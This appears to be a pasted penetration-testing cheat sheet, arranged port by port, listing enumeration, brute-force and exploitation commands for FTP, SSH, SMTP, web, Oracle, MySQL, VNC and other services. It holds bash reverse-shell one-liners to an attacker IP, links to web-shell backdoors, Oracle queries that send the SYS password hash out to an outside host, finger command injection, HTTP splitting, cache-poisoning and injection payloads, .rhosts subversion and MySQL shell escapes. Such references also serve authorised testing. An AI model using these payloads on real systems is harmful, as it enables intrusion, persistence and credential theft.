· 10 years ago · May 03, 2016, 08:54 AM
1FTP port 21 open
2Fingerprint server
3telnet ip_address 21 (Banner grab)
4Run command ftp ip_address
5ftp@example.com
6Check for anonymous access
7ftp ip_addressUsername: anonymous OR anonPassword: any@email.com
8Password guessing
9Hydra brute force
10medusa
11Brutus
12Examine configuration files
13ftpusers
14ftp.conf
15proftpd.conf
16MiTM
17pasvagg.pl
18SSH port 22 open
19Fingerprint server
20telnet ip_address 22 (banner grab)
21scanssh
22scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask
23Password guessing
24ssh root@ip_address
25guess-who
26./b -l username -h ip_address -p 22 -2 < password_file_location
27Hydra brute force
28brutessh
29Ruby SSH Bruteforcer
30Examine configuration files
31ssh_config
32sshd_config
33authorized_keys
34ssh_known_hosts
35.shosts
36SSH Client programs
37tunnelier
38winsshd
39putty
40winscp
41Telnet port 23 open
42Fingerprint server
43telnet ip_address
44Common Banner ListOS/BannerSolaris 8/SunOS 5.8Solaris 2.6/SunOS 5.6Solaris 2.4 or 2.5.1/Unix(r) System V Release 4.0 (hostname)SunOS 4.1.x/SunOS Unix (hostname)FreeBSD/FreeBSD/i386 (hostname) (ttyp1)NetBSD/NetBSD/i386 (hostname) (ttyp1)OpenBSD/OpenBSD/i386 (hostname) (ttyp1)Red Hat 8.0/Red Hat Linux release 8.0 (Psyche)Debian 3.0/Debian GNU/Linux 3.0 / hostnameSGI IRIX 6.x/IRIX (hostname)IBM AIX 4.1.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.IBM AIX 4.2.x or 4.3.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.Nokia IPSO/IPSO (hostname) (ttyp0)Cisco IOS/User Access VerificationLivingston ComOS/ComOS - Livingston PortMaster
45telnetfp
46Password Attack
47Common passwords
48Hydra brute force
49Brutus
50telnet -l "-froot" hostname (Solaris 10+)
51Examine configuration files
52/etc/inetd.conf
53/etc/xinetd.d/telnet
54/etc/xinetd.d/stelnet
55Sendmail Port 25 open
56Fingerprint server
57telnet ip_address 25 (banner grab)
58Mail Server Testing
59Enumerate users
60VRFY username (verifies if username exists - enumeration of accounts)
61EXPN username (verifies if username is valid - enumeration of accounts)
62Mail Spoof Test
63HELO anything MAIL FROM: spoofed_address RCPT TO:valid_mail_account DATA . QUIT
64Mail Relay Test
65HELO anything
66Identical to/from - mail from: <nobody@domain> rcpt to: <nobody@domain>
67Unknown domain - mail from: <user@unknown_domain>
68Domain not present - mail from: <user@localhost>
69Domain not supplied - mail from: <user>
70Source address omission - mail from: <> rcpt to: <nobody@recipient_domain>
71Use IP address of target server - mail from: <user@IP_Address> rcpt to: <nobody@recipient_domain>
72Use double quotes - mail from: <user@domain> rcpt to: <"user@recipent-domain">
73User IP address of the target server - mail from: <user@domain> rcpt to: <nobody@recipient_domain@[IP Address]>
74Disparate formatting - mail from: <user@[IP Address]> rcpt to: <@domain:nobody@recipient-domain>
75Disparate formatting2 - mail from: <user@[IP Address]> rcpt to: <recipient_domain!nobody@[IP Address]>
76Examine Configuration Files
77sendmail.cf
78submit.cf
79DNS port 53 open
80Fingerprint server/ service
81host
82host [-aCdlnrTwv ] [-c class ] [-N ndots ] [-R number ] [-t type ] [-W wait ] name [server ] -v verbose format -t (query type) Allows a user to specify a record type i.e. A, NS, or PTR. -a Same as –t ANY. -l Zone transfer (if allowed). -f Save to a specified filename.
83nslookup
84nslookup [ -option ... ] [ host-to-find | - [ server ]]
85dig
86dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ]
87whois-h Use the named host to resolve the query -a Use ARIN to resolve the query -r Use RIPE to resolve the query -p Use APNIC to resolve the query -Q Perform a quick lookup
88DNS Enumeration
89Bile Suite
90perl BiLE.pl [website] [project_name]
91perl BiLE-weigh.pl [website] [input file]
92perl vet-IPrange.pl [input file] [true domain file] [output file] <range>
93perl vet-mx.pl [input file] [true domain file] [output file]
94perl exp-tld.pl [input file] [output file]
95perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]
96perl qtrace.pl [ip_address_file] [output_file]
97perl jarf-rev [subnetblock] [nameserver]
98txdns
99txdns -rt -t domain_name
100txdns -x 50 -bb domain_name
101txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c: \hostlist.txt
102Examine Configuration Files
103host.conf
104resolv.conf
105named.conf
106TFTP port 69 open
107TFTP Enumeration
108tftp ip_address PUT local_file
109tftp ip_address GET conf.txt (or other files)
110Solarwinds TFTP server
111tftp – i <IP> GET /etc/passwd (old Solaris)
112TFTP Bruteforcing
113TFTP bruteforcer
114Cisco-Torch
115Finger Port 79 open
116User enumeration
117finger 'a b c d e f g h' @example.com
118finger admin@example.com
119finger user@example.com
120finger 0@example.com
121finger .@example.com
122finger **@example.com
123finger test@example.com
124finger @example.com
125Command execution
126finger "|/bin/id@example.com"
127finger "|/bin/ls -a /@example.com"
128Finger Bounce
129finger user@host@victim
130finger @internal@external
131Web Ports 80, 8080 etc. open
132Fingerprint server
133Telnet ip_address port
134Firefox plugins
135All
136firecat
137Specific
138add n edit cookies
139asnumber
140header spy
141live http headers
142shazou
143web developer
144Crawl website
145lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source
146httprint
147Metagoofil
148metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html
149Web Directory enumeration
150Nikto
151nikto [-h target] [options]
152DirBuster
153Wikto
154Goolag Scanner
155Vulnerability Assessment
156Manual Tests
157Default Passwords
158Install Backdoors
159ASP
160http://packetstormsecurity.org/UNIX/penetration/aspxshell.aspx.txt
161Assorted
162http://michaeldaw.org/projects/web-backdoor-compilation/
163http://open-labs.org/hacker_webkit02.tar.gz
164Perl
165http://home.arcor.de/mschierlm/test/pmsh.pl
166http://pentestmonkey.net/tools/perl-reverse-shell/
167http://freeworld.thc.org/download.php?t=r&f=rwwwshell-2.0.pl.gz
168PHP
169http://php.spb.ru/remview/
170http://pentestmonkey.net/tools/php-reverse-shell/
171http://pentestmonkey.net/tools/php-findsock-shell/
172Python
173http://matahari.sourceforge.net/
174TCL
175http://www.irmplc.com/download_pdf.php?src=Creating_Backdoors_in_Cisco_IOS_using_Tcl.pdf&force=yes
176Bash Connect Back Shell
177GnuCitizen
178Atttack Box: nc -l -p Port -vvv
179Victim: $ exec 5<>/dev/tcp/IP_Address/Port
180Victim: $ cat <&5 | while read line; do $line 2>&5 >&5; done
181Neohapsis
182Atttack Box: nc -l -p Port -vvv
183Victim: $ exec 0</dev/tcp/IP_Address/Port # First we copy our connection over stdin
184Victim: $ exec 1>&0 # Next we copy stdin to stdout
185Victim: $ exec 2>&0 # And finally stdin to stderr
186Victim: $ exec /bin/sh 0</dev/tcp/IP_Address/Port 1>&0 2>&0
187Method Testing
188nc IP_Adress Port
189HEAD / HTTP/1.0
190OPTIONS / HTTP/1.0
191PROPFIND / HTTP/1.0
192TRACE / HTTP/1.1
193PUT http://Target_URL/FILE_NAME
194POST http://Target_URL/FILE_NAME HTTP/1.x
195Upload Files
196curl
197curl -u <username:password> -T file_to_upload <Target_URL>
198curl -A "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" <Target_URL>
199put.pl
200put.pl -h target -r /remote_file_name -f local_file_name
201webdav
202cadaver
203View Page Source
204Hidden Values
205Developer Remarks
206Extraneous Code
207Passwords!
208Input Validation Checks
209NULL or null
210Possible error messages returned.
211' , " , ; , <!
212Breaks an SQL string or query; used for SQL, XPath and XML Injection tests.
213– , = , + , "
214Used to craft SQL Injection queries.
215‘ , &, ! , ¦ , < , >
216Used to find command execution vulnerabilities.
217"><script>alert(1)</script>
218Basic Cross-Site Scripting Checks.
219%0d%0a
220Carriage Return (%0d) Line Feed (%0a)
221HTTP Splitting
222language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesireable content here</html>
223i.e. Content-Length= 0 HTTP/1.1 200 OK Content-Type=text/html Content-Length=47<html>blah</html>
224Cache Poisoning
225language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20304%20Not%20Modified%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesireable content here</html>
226%7f , %ff
227byte-length overflows; maximum 7- and 8-bit values.
228-1, other
229Integer and underflow vulnerabilities.
230%n , %x , %s
231Testing for format string vulnerabilities.
232../
233Directory Traversal Vulnerabilities.
234% , _, *
235Wildcard characters can sometimes present DoS issues or information disclosure.
236Ax1024+
237Overflow vulnerabilities.
238Automated table and column iteration
239orderby.py
240./orderby.py www.site.com/index.php?id=
241d3sqlfuzz.py
242./d3sqlfuzz.py www.site.com/index.php?id=-1+UNION+ALL+SELECT+1,COLUMN,3+FROM+TABLE--
243Vulnerability Scanners
244Acunetix
245Grendelscan
246NStealth
247Obiwan III
248w3af
249Specific Applications/ Server Tools
250Domino
251dominoaudit
252dominoaudit.pl [options] -h <IP>
253Joomla
254cms_few
255./cms.py <site-name>
256joomsq
257./joomsq.py <IP>
258joomlascan
259./joomlascan.py <site> <options> [options i.e. -p/-proxy <host:port> : Add proxy support -404 : Don't show 404 responses]
260joomscan
261./joomscan.py -u "www.site.com/joomladir/" -o site.txt -p 127.0.0.1:80
262jscan
263jscan.pl -f hostname
264(shell.txt required)
265aspaudit.pl
266asp-audit.pl http://target/app/filename.aspx (options i.e. -bf)
267Vbulletin
268vbscan.py
269vbscan.py <host> <port> -v
270vbscan.py -update
271ZyXel
272zyxel-bf.sh
273snmpwalk
274snmpwalk -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2
275snmpget
276snmpget -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2.6.0
277Proxy Testing
278Burpsuite
279Crowbar
280Interceptor
281Paros
282Requester Raw
283Suru
284WebScarab
285Examine configuration files
286Generic
287Examine httpd.conf/ windows config files
288JBoss
289JMX Console http://<IP>:8080/jmxconcole/
290War File
291Joomla
292configuration.php
293diagnostics.php
294joomla.inc.php
295config.inc.php
296Mambo
297configuration.php
298config.inc.php
299Wordpress
300setup-config.php
301wp-config.php
302ZyXel
303/WAN.html (contains PPPoE ISP password)
304/WLAN_General.html and /WLAN.html (contains WEP key)
305/rpDyDNS.html (contains DDNS credentials)
306/Firewall_DefPolicy.html (Firewall)
307/CF_Keyword.html (Content Filter)
308/RemMagWWW.html (Remote MGMT)
309/rpSysAdmin.html (System)
310/LAN_IP.html (LAN)
311/NAT_General.html (NAT)
312/ViewLog.html (Logs)
313/rpFWUpload.html (Tools)
314/DiagGeneral.html (Diagnostic)
315/RemMagSNMP.html (SNMP Passwords)
316/LAN_ClientList.html (Current DHCP Leases)
317Config Backups
318/RestoreCfg.html
319/BackupCfg.html
320Note: - The above config files are not human readable and the following tool is required to breakout possible admin credentials and other important settings
321ZyXEL Config Reader
322Examine web server logs
323c:\winnt\system32\Logfiles\W3SVC1
324awk -F " " '{print $3,$11} filename | sort | uniq
325References
326White Papers
327Cross Site Request Forgery: An Introduction to a Common Web Application Weakness
328Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity
329Blind Security Testing - An Evolutionary Approach
330Command Injection in XML Signatures and Encryption
331Input Validation Cheat Sheet
332SQL Injection Cheat Sheet
333Books
334Hacking Exposed Web 2.0
335Hacking Exposed Web Applications
336The Web Application Hacker's Handbook
337Exploit Frameworks
338Brute-force Tools
339Acunetix
340Metasploit
341w3af
342Portmapper port 111 open
343rpcdump.py
344rpcdump.py username:password@IP_Address port/protocol (i.e. 80/HTTP)
345rpcinfo
346rpcinfo [options] IP_Address
347NTP Port 123 open
348NTP Enumeration
349ntpdc -c monlist IP_ADDRESS
350ntpdc -c sysinfo IP_ADDRESS
351ntpq
352host
353hostname
354ntpversion
355readlist
356version
357Examine configuration files
358ntp.conf
359NetBIOS Ports 135-139,445 open
360NetBIOS enumeration
361Enum
362enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>
363Null Session
364net use \\192.168.1.1\ipc$ "" /u:""
365net view \\ip_address
366Dumpsec
367Smbclient
368smbclient -L //server/share password options
369Superscan
370Enumeration tab.
371user2sid/sid2user
372Winfo
373NetBIOS brute force
374Hydra
375Brutus
376Cain & Abel
377getacct
378NAT (NetBIOS Auditing Tool)
379Examine Configuration Files
380Smb.conf
381lmhosts
382SNMP port 161 open
383Default Community Strings
384public
385private
386cisco
387cable-docsis
388ILMI
389MIB enumeration
390Windows NT
391.1.3.6.1.2.1.1.5 Hostnames
392.1.3.6.1.4.1.77.1.4.2 Domain Name
393.1.3.6.1.4.1.77.1.2.25 Usernames
394.1.3.6.1.4.1.77.1.2.3.1.1 Running Services
395.1.3.6.1.4.1.77.1.2.27 Share Information
396Solarwinds MIB walk
397Getif
398snmpwalk
399snmpwalk -v <Version> -c <Community string> <IP>
400Snscan
401Applications
402ZyXel
403snmpget -v2c -c <Community String> <IP> 1.3.6.1.4.1.890.1.2.1.2.6.0
404snmpwalk -v2c -c <Community String> <IP> 1.3.6.1.4.1.890.1.2.1.2
405SNMP Bruteforce
406onesixtyone
407onesixytone -c SNMP.wordlist <IP>
408cat
409./cat -h <IP> -w SNMP.wordlist
410Solarwinds SNMP Brute Force
411ADMsnmp
412Examine SNMP Configuration files
413snmp.conf
414snmpd.conf
415snmp-config.xml
416LDAP Port 389 Open
417ldap enumeration
418ldapminer
419ldapminer -h ip_address -p port (not required if default) -d
420luma
421Gui based tool
422ldp
423Gui based tool
424openldap
425ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]
426ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
427ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn]
428ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
429ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]
430ldap brute force
431bf_ldap
432bf_ldap -s server -d domain name -u|-U username | users list file name -L|-l passwords list | length of passwords to generate optional: -p port (default 389) -v (verbose mode) -P Ldap user path (default ,CN=Users,)
433K0ldS
434LDAP_Brute.pl
435Examine Configuration Files
436General
437containers.ldif
438ldap.cfg
439ldap.conf
440ldap.xml
441ldap-config.xml
442ldap-realm.xml
443slapd.conf
444IBM SecureWay V3 server
445V3.sas.oc
446Microsoft Active Directory server
447msadClassesAttrs.ldif
448Netscape Directory Server 4
449nsslapd.sas_at.conf
450nsslapd.sas_oc.conf
451OpenLDAP directory server
452slapd.sas_at.conf
453slapd.sas_oc.conf
454Sun ONE Directory Server 5.1
45575sas.ldif
456PPTP/L2TP/VPN port 500/1723 open
457Enumeration
458ike-scan
459ike-probe
460Brute-Force
461ike-crack
462Reference Material
463PSK cracking paper
464SecurityFocus Infocus
465Scanning a VPN Implementation
466Modbus port 502 open
467modscan
468rlogin port 513 open
469Rlogin Enumeration
470Find the files
471find / -name .rhosts
472locate .rhosts
473Examine Files
474cat .rhosts
475Manual Login
476rlogin hostname -l username
477rlogin <IP>
478Subvert the files
479echo ++ > .rhosts
480Rlogin Brute force
481Hydra
482rsh port 514 open
483Rsh Enumeration
484rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command
485Rsh Brute Force
486rsh-grind
487Hydra
488medusa
489SQL Server Port 1433 1434 open
490SQL Enumeration
491piggy
492SQLPing
493sqlping ip_address/hostname
494SQLPing2
495SQLPing3
496SQLpoke
497SQL Recon
498SQLver
499SQL Brute Force
500SQLPAT
501sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack
502sqlbf -u hashes.txt -c default.cm -r out.rep - Brute-Force Attack
503SQL Dict
504SQLAT
505Hydra
506SQLlhf
507ForceSQL
508Citrix port 1494 open
509Citrix Enumeration
510Default Domain
511Published Applications
512./citrix-pa-scan {IP_address/file | - | random} [timeout]
513citrix-pa-proxy.pl IP_to_proxy_to [Local_IP]
514Citrix Brute Force
515bforce.js
516connect.js
517Citrix Brute-forcer
518Reference Material
519Hacking Citrix - the legitimate backdoor
520Hacking Citrix - the forceful way
521Oracle Port 1521 Open
522Oracle Enumeration
523oracsec
524Repscan
525Sidguess
526Scuba
527DNS/HTTP Enumeration
528SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE US ERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL; SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAM E='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL
529SQL> select utl_http.request('http://gladius:5500/'||(SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')) from dual;
530WinSID
531Oracle default password list
532TNSVer
533tnsver host [port]
534TCP Scan
535Oracle TNSLSNR
536Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]
537TNSCmd
538perl tnscmd.pl -h ip_address
539perl tnscmd.pl version -h ip_address
540perl tnscmd.pl status -h ip_address
541perl tnscmd.pl -h ip_address --cmdsize (40 - 200)
542LSNrCheck
543Oracle Security Check (needs credentials)
544OAT
545sh opwg.sh -s ip_address
546opwg.bat -s ip_address
547sh oquery.sh -s ip_address -u username -p password -d SID OR c:\oquery -s ip_address -u username -p password -d SID
548OScanner
549sh oscanner.sh -s ip_address
550oscanner.exe -s ip_address
551sh reportviewer.sh oscanner_saved_file.xml
552reportviewer.exe oscanner_saved_file.xml
553NGS Squirrel for Oracle
554Service Register
555Service-register.exe ip_address
556PLSQL Scanner 2008
557Oracle Brute Force
558OAK
559ora-getsid hostname port sid_dictionary_list
560ora-auth-alter-session host port sid username password sql
561ora-brutesid host port start
562ora-pwdbrute host port sid username password-file
563ora-userenum host port sid userlistfile
564ora-ver -e (-f -l -a) host port
565breakable (Targets Application Server Port)
566breakable.exe host url [port] [v]host ip_address of the Oracle Portal Serverurl PATH_INFO i.e. /pls/orassoport TCP port Oracle Portal Server is serving pages fromv verbose
567SQLInjector (Targets Application Server Port)
568sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL
569sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle
570Check Password
571orabf
572orabf [hash]:[username] [options]
573thc-orakel
574Cracker
575Client
576Crypto
577DBVisualisor
578Sql scripts from pentest.co.uk
579Manual sql input of previously reported vulnerabilties
580Oracle Reference Material
581Understanding SQL Injection
582SQL Injection walkthrough
583SQL Injection by example
584Advanced SQL Injection in Oracle databases
585Blind SQL Injection
586SQL Cheatsheets
587http://ha.ckers.org/sqlinjection
588http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
589http://www.0x000000.com/?i=14
590http://pentestmonkey.net/
591NFS Port 2049 open
592NFS Enumeration
593showmount -e hostname/ip_address
594mount -t nfs ip_address:/directory_found_exported /local_mount_point
595NFS Brute Force
596Interact with NFS share and try to add/delete
597Exploit and Confuse Unix
598Examine Configuration Files
599/etc/exports
600/etc/lib/nfs/xtab
601Compaq/HP Insight Manager Port 2301,2381open
602HP Enumeration
603Authentication Method
604Host OS Authentication
605Default Authentication
606Default Passwords
607Wikto
608Nstealth
609HP Bruteforce
610Hydra
611Acunetix
612Examine Configuration Files
613path.properties
614mx.log
615CLIClientConfig.cfg
616database.props
617pg_hba.conf
618jboss-service.xml
619.namazurc
620MySQL port 3306 open
621Enumeration
622nmap -A -n -p3306 <IP Address>
623nmap -A -n -PN --script:ALL -p3306 <IP Address>
624telnet IP_Address 3306
625use test; select * from test;
626To check for other DB's -- show databases
627Administration
628MySQL Network Scanner
629MySQL GUI Tools
630mysqlshow
631mysqlbinlog
632Manual Checks
633Default usernames and passwords
634username: root password:
635testing
636mysql -h <Hostname> -u root
637mysql -h <Hostname> -u root
638mysql -h <Hostname> -u root@localhost
639mysql -h <Hostname>
640mysql -h <Hostname> -u ""@localhost
641Configuration Files
642Operating System
643windows
644config.ini
645my.ini
646windows\my.ini
647winnt\my.ini
648<InstDir>/mysql/data/
649unix
650my.cnf
651/etc/my.cnf
652/etc/mysql/my.cnf
653/var/lib/mysql/my.cnf
654~/.my.cnf
655/etc/my.cnf
656Command History
657~/.mysql.history
658Log Files
659connections.log
660update.log
661common.log
662To run many sql commands at once -- mysql -u username -p < manycommands.sql
663MySQL data directory (Location specified in my.cnf)
664Parent dir = data directory
665mysql
666test
667information_schema (Key information in MySQL)
668Complete table list -- select table_schema,table_name from tables;
669Exact privileges -- select grantee, table_schema, privilege_type FROM schema_privileges;
670File privileges -- select user,file_priv from mysql.user where user='root';
671Version -- select version();
672Load a specific file -- SELECT LOAD_FILE('FILENAME');
673SSL Check
674mysql> show variables like 'have_openssl';
675If there's no rows returned at all it means the the distro itself doesn't support SSL connections and probably needs to be recompiled. If its disabled it means that the service just wasn't started with ssl and can be easily fixed.
676Privilege Escalation
677Current Level of access
678mysql>select user();
679mysql>select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user where user='OUTPUT OF select user()';
680Access passwords
681mysql> use mysql
682mysql> select user,password from user;
683Create a new user and grant him privileges
684mysql>create user test identified by 'test';
685mysql> grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;
686Break into a shell
687mysql> \! cat /etc/passwd
688mysql> \! bash
689SQL injection
690mysql-miner.pl
691mysql-miner.pl http://target/ expected_string database
692http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html
693http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/
694References.
695Design Weaknesses
696MySQL running as root
697Exposed publicly on Internet
698http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql
699http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0
700RDesktop port 3389 open
701Rdesktop Enumeration
702Remote Desktop Connection
703Rdestop Bruteforce
704TSGrinder
705tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address
706Tscrack
707Sybase Port 5000+ open
708Sybase Enumeration
709sybase-version ip_address from NGS
710Sybase Vulnerability Assessment
711Use DBVisualiser
712Sybase Security checksheet
713Copy output into excel spreadsheet
714Evaluate mis-configured parameters
715Manual sql input of previously reported vulnerabilties
716Advanced SQL Injection in SQL Server
717More Advanced SQL Injection
718NGS Squirrel for Sybase
719SIP Port 5060 open
720SIP Enumeration
721netcat
722nc IP_Address Port
723sipflanker
724python sipflanker.py 192.168.1-254
725Sipscan
726smap
727smap IP_Address/Subnet_Mask
728smap -o IP_Address/Subnet_Mask
729smap -l IP_Address
730SIP Packet Crafting etc.
731sipsak
732Tracing paths: - sipsak -T -s sip:usernaem@domain
733Options request:- sipsak -vv -s sip:username@domain
734Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain
735siprogue
736SIP Vulnerability Scanning/ Brute Force
737tftp bruteforcer
738Default dictionary file
739./tftpbrute.pl IP_Address Dictionary_file Maximum_Processes
740VoIPaudit
741SiVuS
742Examine Configuration Files
743SIPDefault.cnf
744asterisk.conf
745sip.conf
746phone.conf
747sip_notify.conf
748<Ethernet address>.cfg
749000000000000.cfg
750phone1.cfg
751sip.cfg etc. etc.
752VNC port 5900^ open
753VNC Enumeration
754Scans
7555900^ for direct access.5800 for HTTP access.
756VNC Brute Force
757Password Attacks
758Remote
759Password Guess
760vncrack
761Password Crack
762vncrack
763Packet Capture
764Phosshttp://www.phenoelit.de/phoss
765Local
766Registry Locations
767\HKEY_CURRENT_USER\Software\ORL\WinVNC3
768\HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3
769Decryption Key
7700x238210763578887
771Exmine Configuration Files
772.vnc
773/etc/vnc/config
774$HOME/.vnc/config
775/etc/sysconfig/vncservers
776/etc/vnc.conf
777X11 port 6000^ open
778X11 Enumeration
779List open windows
780Authentication Method
781Xauth
782Xhost
783X11 Exploitation
784xwd
785xwd -display 192.168.0.1:0 -root -out 192.168.0.1.xpm
786Keystrokes
787Received
788Transmitted
789Screenshots
790xhost +
791Examine Configuration Files
792/etc/Xn.hosts
793/usr/lib/X11/xdm
794Search through all files for the command "xhost +" or "/usr/bin/X11/xhost +"
795/usr/lib/X11/xdm/xsession
796/usr/lib/X11/xdm/xsession-remote
797/usr/lib/X11/xdm/xsession.0
798/usr/lib/X11/xdm/xdm-config
799DisplayManager*authorize:on
800Tor Port 9001, 9030 open
801Tor Node Checker
802Ip Pages
803Kewlio.net
804nmap NSE script
805Jet Direct 9100 open
806hijetta
807
808http://www.0daysecurity.com/pentest.html
809http://www.0daysecurity.com/penetration-testing/enumeration.html